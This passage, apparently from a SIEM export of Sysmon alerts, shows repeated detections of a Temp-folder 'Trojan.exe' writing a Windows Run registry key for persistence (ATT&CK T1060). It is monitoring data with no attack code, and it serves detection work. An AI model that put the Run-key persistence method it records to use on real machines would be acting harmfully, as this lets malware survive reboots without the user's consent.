..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:35.435966800Z"",""eventRecordID"":""2010"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:35.434\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:35.434"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:37.815",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:34.402 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:34.417196300Z"",""eventRecordID"":""2008"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:34.402\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:34.402"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:36.776",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:33.371 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:33.375259600Z"",""eventRecordID"":""2007"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:33.371\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:33.371"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:35.747",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:32.356 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:32.357577900Z"",""eventRecordID"":""2006"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:32.356\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:32.356"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:34.746",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:31.340 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:31.345210900Z"",""eventRecordID"":""2005"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:31.340\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:31.340"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:33.701",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:30.324 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:30.325274000Z"",""eventRecordID"":""2002"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:30.324\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:30.324"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:32.699",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:29.308 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:29.310809700Z"",""eventRecordID"":""2001"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:29.308\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:29.308"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:31.684",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:28.293 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:28.301009300Z"",""eventRecordID"":""2000"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:28.293\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:28.293"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:30.653",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:27.261 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:27.266046600Z"",""eventRecordID"":""1999"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:27.261\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:27.261"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:29.637",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:26.230 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:26.233516400Z"",""eventRecordID"":""1998"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:26.230\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:26.230"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:27:28.635",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:25.215 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:25.218954200Z"",""eventRecordID"":""1995"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:25.215\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:25.215"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:27:27.618",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:24.199 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 